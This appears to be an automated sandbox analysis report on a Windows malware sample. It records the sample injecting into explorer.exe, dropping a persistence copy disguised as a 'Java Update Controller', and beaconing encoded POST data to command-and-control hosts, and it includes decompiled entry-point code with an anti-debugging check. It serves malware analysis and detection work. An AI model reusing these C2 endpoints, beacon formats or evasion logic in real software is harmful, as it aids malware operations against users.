Aug 1, 2021 13:07:54.194727898 CEST	6195	IN	HTTP/1.1 301 Moved Permanently Server: nginx Date: Sun, 01 Aug 2021 11:07:54 GMT Content-Type: text/html Content-Length: 162 Connection: keep-alive Location: https://firecrackers.ru/kin/logout.php Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
8	192.168.2.3	49776	91.234.34.80	80	C:\Windows\SysWOW64\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Aug 1, 2021 13:07:57.221851110 CEST	6199	OUT	POST /kin/logout.php?id=6303254 HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Host: firecrackers.ru Content-Length: 1057 Cache-Control: no-cache
Aug 1, 2021 13:07:57.222090960 CEST	6200	OUT	Data Raw: 69 71 65 6d 75 69 3d 37 37 37 64 36 35 61 64 31 32 30 65 39 65 32 66 32 32 32 62 33 38 65 31 36 65 26 67 6d 79 65 3d 33 38 34 39 38 33 34 36 26 6b 75 6b 75 65 75 65 75 3d 45 33 43 46 44 45 41 33 38 35 37 41 39 31 42 41 35 41 33 32 36 34 38 37 35 Data Ascii: iqemui=777d65ad120e9e2f222b38e16e&gmye=38498346&kukueueu=E3CFDEA3857A91BA5A326487543EE4F2FD1AC7B688E1C6C885C80F2D3DFBC7701D771FFAB37EF79E42C4CE565817CD3B41BAEB105563573DCF2D898105FBEC631E3A8A7CCF340048EC0075ED12DE6A18C309BA8691CA84121C2EED6A52
Aug 1, 2021 13:07:57.276079893 CEST	6201	IN	HTTP/1.1 301 Moved Permanently Server: nginx Date: Sun, 01 Aug 2021 11:07:57 GMT Content-Type: text/html Content-Length: 162 Connection: keep-alive Location: https://firecrackers.ru/kin/logout.php?id=6303254 Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>
Aug 1, 2021 13:07:57.471903086 CEST	6203	OUT	GET /kin/logout.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Cache-Control: no-cache Connection: Keep-Alive Host: firecrackers.ru
Aug 1, 2021 13:07:57.527034044 CEST	6204	IN	HTTP/1.1 301 Moved Permanently Server: nginx Date: Sun, 01 Aug 2021 11:07:57 GMT Content-Type: text/html Content-Length: 162 Connection: keep-alive Location: https://firecrackers.ru/kin/logout.php Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
9	192.168.2.3	49778	64.70.19.203	80	C:\Windows\SysWOW64\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Aug 1, 2021 13:08:10.499155998 CEST	6207	OUT	POST /kin/logout.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Host: xircus.ws Content-Length: 1072 Cache-Control: no-cache
Aug 1, 2021 13:08:10.499351025 CEST	6208	OUT	Data Raw: 74 6d 66 79 78 71 6a 63 62 3d 34 62 63 65 32 39 38 66 66 63 62 66 36 31 63 37 64 33 39 66 26 72 69 7a 71 6e 65 76 3d 38 34 35 35 39 34 37 33 26 76 71 6c 67 68 3d 41 31 38 45 35 32 44 31 34 39 46 42 32 35 43 31 31 44 45 41 30 44 38 37 37 44 41 44 Data Ascii: tmfyxqjcb=4bce298ffcbf61c7d39f&rizqnev=84559473&vqlgh=A18E52D149FB25C11DEA0D877DAD7519DDAC9479C364BB762FDED7CF7380F46B9005C4813AAEB4A9F95A74C18B8711CD9F3773BAE5CDFA8FD30CD70FFA6C34FDFD8A1E2D1F69FE8E9F9279A326911D0C32AE167A5EFF9ECAC1399F882EF26
Aug 1, 2021 13:08:10.666026115 CEST	6209	IN	HTTP/1.1 405 Not Allowed Server: openresty Date: Sun, 01 Aug 2021 11:08:10 GMT Content-Type: text/html Content-Length: 154 Connection: keep-alive Allow: GET,HEAD Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>

HTTPS Packets

Timestamp	Source IP	Source Port	Dest IP	Dest Port	Subject	Issuer	Not Before	Not After	JA3 SSL Client Fingerprint	JA3 SSL Client Digest
Aug 1, 2021 13:06:51.947254896 CEST	91.234.34.80	443	192.168.2.3	49753	CN=firecrackers.ru CN=R3, O=Let's Encrypt, C=US CN=ISRG Root X1, O=Internet Security Research Group, C=US	CN=R3, O=Let's Encrypt, C=US CN=ISRG Root X1, O=Internet Security Research Group, C=US CN=DST Root CA X3, O=Digital Signature Trust Co.	Thu Jul 01 09:21:12 CEST 2021 Fri Sep 04 02:00:00 CEST 2020 Wed Jan 20 20:14:03 CET 2021	Wed Sep 29 09:21:11 CEST 2021 Mon Sep 15 18:00:00 CEST 2025 Mon Sep 30 20:14:03 CEST 2024	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-24-65281,29-23-24,0	57f3642b4e37e28f5cbe3020c9331b4c
					CN=R3, O=Let's Encrypt, C=US	CN=ISRG Root X1, O=Internet Security Research Group, C=US	Fri Sep 04 02:00:00 CEST 2020	Mon Sep 15 18:00:00 CEST 2025
					CN=ISRG Root X1, O=Internet Security Research Group, C=US	CN=DST Root CA X3, O=Digital Signature Trust Co.	Wed Jan 20 20:14:03 CET 2021	Mon Sep 30 20:14:03 CEST 2024

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: 144C0621CA5ECB402DE01D8F10044F92A2EF917522E4B.exe PID: 4812 Parent PID: 5720

General

Start time:	13:04:04
Start date:	01/08/2021
Path:	C:\Users\user\Desktop\144C0621CA5ECB402DE01D8F10044F92A2EF917522E4B.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\144C0621CA5ECB402DE01D8F10044F92A2EF917522E4B.exe'
Imagebase:	0x400000
File size:	570880 bytes
MD5 hash:	C46F1A56503F218C2977B4B42F5AA84B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: explorer.exe PID: 6068 Parent PID: 4812

General

Start time:	13:04:53
Start date:	01/08/2021
Path:	C:\Windows\SysWOW64\explorer.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\explorer.exe
Imagebase:	0x50000
File size:	3611360 bytes
MD5 hash:	166AB1B9462E5C1D6D18EC5EC0B6A5F7
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: gGRiqYglIOLbY.exe PID: 4736 Parent PID: 6068

General

Start time:	13:04:59
Start date:	01/08/2021
Path:	C:\Program Files (x86)\LVCHlGQXfkIOYpbmPccpxcWUcKcoFKQFklxbbasmlNfbBesaRuTlmZKqvvAZEkKvLmClHTJw\gGRiqYglIOLbY.exe
Wow64 process (32bit):	true
Commandline:	C:\Program Files (x86)\LVCHlGQXfkIOYpbmPccpxcWUcKcoFKQFklxbbasmlNfbBesaRuTlmZKqvvAZEkKvLmClHTJw\gGRiqYglIOLbY.exe
Imagebase:	0xfc0000
File size:	909312 bytes
MD5 hash:	77276DDC82248473D033E2494C438A97
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: gGRiqYglIOLbY.exe PID: 3888 Parent PID: 6068

General

Start time:	13:05:01
Start date:	01/08/2021
Path:	C:\Program Files (x86)\LVCHlGQXfkIOYpbmPccpxcWUcKcoFKQFklxbbasmlNfbBesaRuTlmZKqvvAZEkKvLmClHTJw\gGRiqYglIOLbY.exe
Wow64 process (32bit):	true
Commandline:	C:\Program Files (x86)\LVCHlGQXfkIOYpbmPccpxcWUcKcoFKQFklxbbasmlNfbBesaRuTlmZKqvvAZEkKvLmClHTJw\gGRiqYglIOLbY.exe
Imagebase:	0xfc0000
File size:	909312 bytes
MD5 hash:	77276DDC82248473D033E2494C438A97
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: gGRiqYglIOLbY.exe PID: 4840 Parent PID: 6068

General

Start time:	13:05:05
Start date:	01/08/2021
Path:	C:\Program Files (x86)\LVCHlGQXfkIOYpbmPccpxcWUcKcoFKQFklxbbasmlNfbBesaRuTlmZKqvvAZEkKvLmClHTJw\gGRiqYglIOLbY.exe
Wow64 process (32bit):	true
Commandline:	C:\Program Files (x86)\LVCHlGQXfkIOYpbmPccpxcWUcKcoFKQFklxbbasmlNfbBesaRuTlmZKqvvAZEkKvLmClHTJw\gGRiqYglIOLbY.exe
Imagebase:	0xfc0000
File size:	909312 bytes
MD5 hash:	77276DDC82248473D033E2494C438A97
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: gGRiqYglIOLbY.exe PID: 2524 Parent PID: 6068

General

Start time:	13:05:08
Start date:	01/08/2021
Path:	C:\Program Files (x86)\LVCHlGQXfkIOYpbmPccpxcWUcKcoFKQFklxbbasmlNfbBesaRuTlmZKqvvAZEkKvLmClHTJw\gGRiqYglIOLbY.exe
Wow64 process (32bit):	true
Commandline:	C:\Program Files (x86)\LVCHlGQXfkIOYpbmPccpxcWUcKcoFKQFklxbbasmlNfbBesaRuTlmZKqvvAZEkKvLmClHTJw\gGRiqYglIOLbY.exe
Imagebase:	0xfc0000
File size:	909312 bytes
MD5 hash:	77276DDC82248473D033E2494C438A97
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: 935aa375omok5c.exe PID: 5576 Parent PID: 3388

General

Start time:	13:05:09
Start date:	01/08/2021
Path:	C:\ProgramData\Java Update Controller\935aa375omok5c.exe
Wow64 process (32bit):	true
Commandline:	'C:\ProgramData\Java Update Controller\935aa375omok5c.exe'
Imagebase:	0x400000
File size:	570880 bytes
MD5 hash:	C46F1A56503F218C2977B4B42F5AA84B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: gGRiqYglIOLbY.exe PID: 3544 Parent PID: 6068

General

Start time:	13:05:15
Start date:	01/08/2021
Path:	C:\Program Files (x86)\LVCHlGQXfkIOYpbmPccpxcWUcKcoFKQFklxbbasmlNfbBesaRuTlmZKqvvAZEkKvLmClHTJw\gGRiqYglIOLbY.exe
Wow64 process (32bit):	true
Commandline:	C:\Program Files (x86)\LVCHlGQXfkIOYpbmPccpxcWUcKcoFKQFklxbbasmlNfbBesaRuTlmZKqvvAZEkKvLmClHTJw\gGRiqYglIOLbY.exe
Imagebase:	0xfc0000
File size:	909312 bytes
MD5 hash:	77276DDC82248473D033E2494C438A97
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: 935aa375omok5c.exe PID: 1836 Parent PID: 3388

General

Start time:	13:05:17
Start date:	01/08/2021
Path:	C:\ProgramData\Java Update Controller\935aa375omok5c.exe
Wow64 process (32bit):	true
Commandline:	'C:\ProgramData\Java Update Controller\935aa375omok5c.exe'
Imagebase:	0x400000
File size:	570880 bytes
MD5 hash:	C46F1A56503F218C2977B4B42F5AA84B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: gGRiqYglIOLbY.exe PID: 5084 Parent PID: 6068

General

Start time:	13:05:23
Start date:	01/08/2021
Path:	C:\Program Files (x86)\LVCHlGQXfkIOYpbmPccpxcWUcKcoFKQFklxbbasmlNfbBesaRuTlmZKqvvAZEkKvLmClHTJw\gGRiqYglIOLbY.exe
Wow64 process (32bit):	true
Commandline:	C:\Program Files (x86)\LVCHlGQXfkIOYpbmPccpxcWUcKcoFKQFklxbbasmlNfbBesaRuTlmZKqvvAZEkKvLmClHTJw\gGRiqYglIOLbY.exe
Imagebase:	0xfc0000
File size:	909312 bytes
MD5 hash:	77276DDC82248473D033E2494C438A97
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: 935aa375omok5c.exe PID: 5044 Parent PID: 3388

General

Start time:	13:05:25
Start date:	01/08/2021
Path:	C:\ProgramData\Java Update Controller\935aa375omok5c.exe
Wow64 process (32bit):	true
Commandline:	'C:\ProgramData\Java Update Controller\935aa375omok5c.exe'
Imagebase:	0x400000
File size:	570880 bytes
MD5 hash:	C46F1A56503F218C2977B4B42F5AA84B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: 935aa375omok5c.exe PID: 4672 Parent PID: 3388

General

Start time:	13:05:35
Start date:	01/08/2021
Path:	C:\ProgramData\Java Update Controller\935aa375omok5c.exe
Wow64 process (32bit):	true
Commandline:	'C:\ProgramData\Java Update Controller\935aa375omok5c.exe'
Imagebase:	0x400000
File size:	570880 bytes
MD5 hash:	C46F1A56503F218C2977B4B42F5AA84B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: gGRiqYglIOLbY.exe PID: 4660 Parent PID: 6068

General

Start time:	13:06:16
Start date:	01/08/2021
Path:	C:\Program Files (x86)\LVCHlGQXfkIOYpbmPccpxcWUcKcoFKQFklxbbasmlNfbBesaRuTlmZKqvvAZEkKvLmClHTJw\gGRiqYglIOLbY.exe
Wow64 process (32bit):	true
Commandline:	C:\Program Files (x86)\LVCHlGQXfkIOYpbmPccpxcWUcKcoFKQFklxbbasmlNfbBesaRuTlmZKqvvAZEkKvLmClHTJw\gGRiqYglIOLbY.exe
Imagebase:	0xfc0000
File size:	909312 bytes
MD5 hash:	77276DDC82248473D033E2494C438A97
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: gGRiqYglIOLbY.exe PID: 2392 Parent PID: 6068

General

Start time:	13:06:22
Start date:	01/08/2021
Path:	C:\Program Files (x86)\LVCHlGQXfkIOYpbmPccpxcWUcKcoFKQFklxbbasmlNfbBesaRuTlmZKqvvAZEkKvLmClHTJw\gGRiqYglIOLbY.exe
Wow64 process (32bit):	true
Commandline:	C:\Program Files (x86)\LVCHlGQXfkIOYpbmPccpxcWUcKcoFKQFklxbbasmlNfbBesaRuTlmZKqvvAZEkKvLmClHTJw\gGRiqYglIOLbY.exe
Imagebase:	0xfc0000
File size:	909312 bytes
MD5 hash:	77276DDC82248473D033E2494C438A97
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: gGRiqYglIOLbY.exe PID: 1008 Parent PID: 6068

General

Start time:	13:06:30
Start date:	01/08/2021
Path:	C:\Program Files (x86)\LVCHlGQXfkIOYpbmPccpxcWUcKcoFKQFklxbbasmlNfbBesaRuTlmZKqvvAZEkKvLmClHTJw\gGRiqYglIOLbY.exe
Wow64 process (32bit):	true
Commandline:	C:\Program Files (x86)\LVCHlGQXfkIOYpbmPccpxcWUcKcoFKQFklxbbasmlNfbBesaRuTlmZKqvvAZEkKvLmClHTJw\gGRiqYglIOLbY.exe
Imagebase:	0xfc0000
File size:	909312 bytes
MD5 hash:	77276DDC82248473D033E2494C438A97
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: gGRiqYglIOLbY.exe PID: 3484 Parent PID: 6068

General

Start time:	13:06:34
Start date:	01/08/2021
Path:	C:\Program Files (x86)\LVCHlGQXfkIOYpbmPccpxcWUcKcoFKQFklxbbasmlNfbBesaRuTlmZKqvvAZEkKvLmClHTJw\gGRiqYglIOLbY.exe
Wow64 process (32bit):	true
Commandline:	C:\Program Files (x86)\LVCHlGQXfkIOYpbmPccpxcWUcKcoFKQFklxbbasmlNfbBesaRuTlmZKqvvAZEkKvLmClHTJw\gGRiqYglIOLbY.exe
Imagebase:	0xfc0000
File size:	909312 bytes
MD5 hash:	77276DDC82248473D033E2494C438A97
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: gGRiqYglIOLbY.exe PID: 3948 Parent PID: 6068

General

Start time:	13:06:38
Start date:	01/08/2021
Path:	C:\Program Files (x86)\LVCHlGQXfkIOYpbmPccpxcWUcKcoFKQFklxbbasmlNfbBesaRuTlmZKqvvAZEkKvLmClHTJw\gGRiqYglIOLbY.exe
Wow64 process (32bit):	true
Commandline:	C:\Program Files (x86)\LVCHlGQXfkIOYpbmPccpxcWUcKcoFKQFklxbbasmlNfbBesaRuTlmZKqvvAZEkKvLmClHTJw\gGRiqYglIOLbY.exe
Imagebase:	0xfc0000
File size:	909312 bytes
MD5 hash:	77276DDC82248473D033E2494C438A97
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: 144C0621CA5ECB402DE01D8F10044F92A2EF917522E4B.exe PID: 4812 Parent PID: 5720 144C0621CA5ECB402DE01D8F10044F92A2EF917522E4B.exeCOMMON

Executed Functions

Function 004015C6, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 67
COMMON

Download Yara Rule

C-Code - Quality: 95%

			_entry_() {
				char _v8;
				char _v12;
				void* _t10;
				signed int _t11;
				void* _t23;
				void* _t29;

				_v8 = 0;
				_v12 = 0;
				_t10 = 0;
				while( *((intOrPtr*)(_t10 + 0x403026)) == 0) {
					_t10 = _t10 + 1;
					if(_t10 < 0x100) {
						continue;
					}
					break;
				}
				_t11 =  *[fs:0x30];
				if(_t11 == 0 ||  *((char*)(_t11 + 2)) != 1) {
					SetErrorMode(0x8007); // executed
					SetUnhandledExceptionFilter(E0040102F); // executed
					GetModuleFileNameW(0, L"C:\\Users\\hardz\\Desktop\\144C0621CA5ECB402DE01D8F10044F92A2EF917522E4B.exe", 0x104);
					asm("sbb eax, eax");
					 *0x403330 =  ~( ~( *[fs:0x30]));
					E00401101();
					if(E0040116C() != 1) {
						_t31 = E004013A7();
						if(_t20 != 0) {
							_t23 = E004014F4(_t31,  &_v12,  &_v8); // executed
							_t30 = _t23;
							if(_t23 != 0 && E0040146F( *((intOrPtr*)(_t31 + 0x1c)), _t30, 0x403000) != 0) {
								E00401C93(_t29, _t30, _v12, _v8); // executed
							}
						}
						goto L11;
					}
					L6:
					WaitForSingleObjectEx(0xffffffff, 0x1388, 1);
					goto L6;
				} else {
					L11:
					ExitProcess(0);
				}
			}

0x004015d0
0x004015d3
0x004015d6
0x004015d8
0x004015e0
0x004015e6
0x00000000
0x00000000
0x00000000
0x004015e6
0x004015e8
0x004015f0
0x00401601
0x0040160c
0x0040161d
0x0040162b
0x0040162f
0x00401634
0x00401641
0x00401659
0x0040165d
0x00401667
0x0040166c
0x00401670
0x0040168b
0x0040168b
0x00401670
0x00000000
0x0040165d
0x00401643
0x0040164c
0x00000000
0x00401690
0x00401690
0x00401691
0x00401691

APIs

SetErrorMode.KERNEL32(00008007), ref: 00401601
SetUnhandledExceptionFilter.KERNEL32(0040102F), ref: 0040160C
GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\144C0621CA5ECB402DE01D8F10044F92A2EF917522E4B.exe,00000104), ref: 0040161D
WaitForSingleObjectEx.KERNEL32(000000FF,00001388,00000001), ref: 0040164C
ExitProcess.KERNEL32 ref: 00401691

Strings

C:\Users\user\Desktop\144C0621CA5ECB402DE01D8F10044F92A2EF917522E4B.exe, xrefs: 00401617

Memory Dump Source

Source File: 00000000.00000002.309850072.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.309858530.0000000000433000.00000040.00020000.sdmp Download File

Similarity

API ID: ErrorExceptionExitFileFilterModeModuleNameObjectProcessSingleUnhandledWait
String ID: C:\Users\user\Desktop\144C0621CA5ECB402DE01D8F10044F92A2EF917522E4B.exe
API String ID: 917555860-91346719
Opcode ID: 16f356daf6f393dde2f0bf725c7fffae60c82fbc2685a6c3713f5e0e04f7ae90
Instruction ID: 3836bf5afa92f843fd13b347da58792fe200a265b58757a495e8483f53cbbfd5
Opcode Fuzzy Hash: 16f356daf6f393dde2f0bf725c7fffae60c82fbc2685a6c3713f5e0e04f7ae90
Instruction Fuzzy Hash: 1511D6719403447FDB21AFB08E89E6E7AACAB05700F14097AF202F71F1CABD9A40871C

Uniqueness

Uniqueness Score: -1.00%

Function 00600000, Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 285memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,?,00001000,00000004,?,72D08B8C), ref: 0060018C
VirtualProtect.KERNEL32(?,?,00000040,?), ref: 006001FD
CreateActCtxA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00600306

Strings

, xrefs: 006002D6
a, xrefs: 006002CB

Memory Dump Source

Source File: 00000000.00000002.310020710.0000000000600000.00000040.00000001.sdmp, Offset: 00600000, based on PE: false

Similarity

API ID: Virtual$AllocCreateProtect
String ID: $a
API String ID: 2413513597-206647194
Opcode ID: 2b74b7560147f6a3171f96d9c91d11626458d92188a21795b354f158c7a4578d
Instruction ID: 41e4d43e666425fc2d359ca4bc159c1a6ef042bff55686908e29cfd866e90f13
Opcode Fuzzy Hash: 2b74b7560147f6a3171f96d9c91d11626458d92188a21795b354f158c7a4578d
Instruction Fuzzy Hash: A5C146715083018FD728CF64C494B6BB7E2FF88314F55896DE8869B392D771E845CB52

Uniqueness

Uniqueness Score: -1.00%

Function 02450F5A, Relevance: 1.5, APIs: 1, Instructions: 7libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 02450F6A

Memory Dump Source

Source File: 00000000.00000002.310730492.0000000002450000.00000040.00000001.sdmp, Offset: 02450000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 99e0b6e7668523099fed9a429aaf58bb9579d77f2b4ebc17e9c1e28f12427aab
Instruction ID: d067d6f7f8c43baaaaf0cc7687b67092a4983909d97787ad746ac17b45ac11b7
Opcode Fuzzy Hash: 99e0b6e7668523099fed9a429aaf58bb9579d77f2b4ebc17e9c1e28f12427aab
Instruction Fuzzy Hash: 33B0927018A28A5BC341A721082AAA36B592BA1210BAD85AED0C00614BCB180675E7A2

Uniqueness

Uniqueness Score: -1.00%

Function 00401101, Relevance: 49.0, APIs: 14, Strings: 14, Instructions: 32
libraryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00401101() {
				struct HINSTANCE__* _t14;

				LoadLibraryA("user32.dll");
				LoadLibraryA("secur32.dll"); // executed
				LoadLibraryA("crypt32.dll"); // executed
				LoadLibraryA("advapi32.dll");
				LoadLibraryA("wininet.dll"); // executed
				LoadLibraryA("shell32.dll"); // executed
				LoadLibraryA("shlwapi.dll");
				LoadLibraryA("ole32.dll"); // executed
				LoadLibraryA("version.dll"); // executed
				LoadLibraryA("sfc.dll"); // executed
				LoadLibraryA("sfc_os.dll"); // executed
				LoadLibraryA("ws2_32.dll"); // executed
				LoadLibraryA("Netapi32.dll"); // executed
				_t14 = LoadLibraryA("Urlmon.dll"); // executed
				return _t14;
			}

0x0040110d
0x00401114
0x0040111b
0x00401122
0x00401129
0x00401130
0x00401137
0x0040113e
0x00401145
0x0040114c
0x00401153
0x0040115a
0x00401161
0x00401168
0x0040116b

APIs

LoadLibraryA.KERNEL32(user32.dll,?,00401639), ref: 0040110D
LoadLibraryA.KERNEL32(secur32.dll,?,00401639), ref: 00401114
LoadLibraryA.KERNEL32(crypt32.dll,?,00401639), ref: 0040111B
LoadLibraryA.KERNEL32(advapi32.dll,?,00401639), ref: 00401122
LoadLibraryA.KERNEL32(wininet.dll,?,00401639), ref: 00401129
LoadLibraryA.KERNEL32(shell32.dll,?,00401639), ref: 00401130
LoadLibraryA.KERNEL32(shlwapi.dll,?,00401639), ref: 00401137
LoadLibraryA.KERNEL32(ole32.dll,?,00401639), ref: 0040113E
LoadLibraryA.KERNEL32(version.dll,?,00401639), ref: 00401145
LoadLibraryA.KERNEL32(sfc.dll,?,00401639), ref: 0040114C
LoadLibraryA.KERNEL32(sfc_os.dll,?,00401639), ref: 00401153
LoadLibraryA.KERNEL32(ws2_32.dll,?,00401639), ref: 0040115A
LoadLibraryA.KERNEL32(Netapi32.dll,?,00401639), ref: 00401161
LoadLibraryA.KERNEL32(Urlmon.dll,?,00401639), ref: 00401168

Strings

Netapi32.dll, xrefs: 0040115C
sfc.dll, xrefs: 00401147
user32.dll, xrefs: 00401108
shlwapi.dll, xrefs: 00401132
ws2_32.dll, xrefs: 00401155
Urlmon.dll, xrefs: 00401163
shell32.dll, xrefs: 0040112B
secur32.dll, xrefs: 0040110F
sfc_os.dll, xrefs: 0040114E
ole32.dll, xrefs: 00401139
crypt32.dll, xrefs: 00401116
wininet.dll, xrefs: 00401124
version.dll, xrefs: 00401140
advapi32.dll, xrefs: 0040111D

Memory Dump Source

Source File: 00000000.00000002.309850072.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.309858530.0000000000433000.00000040.00020000.sdmp Download File

Similarity

API ID: LibraryLoad
String ID: Netapi32.dll$Urlmon.dll$advapi32.dll$crypt32.dll$ole32.dll$secur32.dll$sfc.dll$sfc_os.dll$shell32.dll$shlwapi.dll$user32.dll$version.dll$wininet.dll$ws2_32.dll
API String ID: 1029625771-4252655668
Opcode ID: f165507b56b44f60dc8062e918fe79b13f6a80f187b183035aee990d7e1dbbaf
Instruction ID: c6160a1b9cfaf449a6d20608b7edf9e9bb879aa63acb4ce97e8131481719129b
Opcode Fuzzy Hash: f165507b56b44f60dc8062e918fe79b13f6a80f187b183035aee990d7e1dbbaf
Instruction Fuzzy Hash: 94E0C961ED233A6985A833EA2F0EB4B2D159984AA07308173A7483A0C108F80488D9FA

Uniqueness

Uniqueness Score: -1.00%

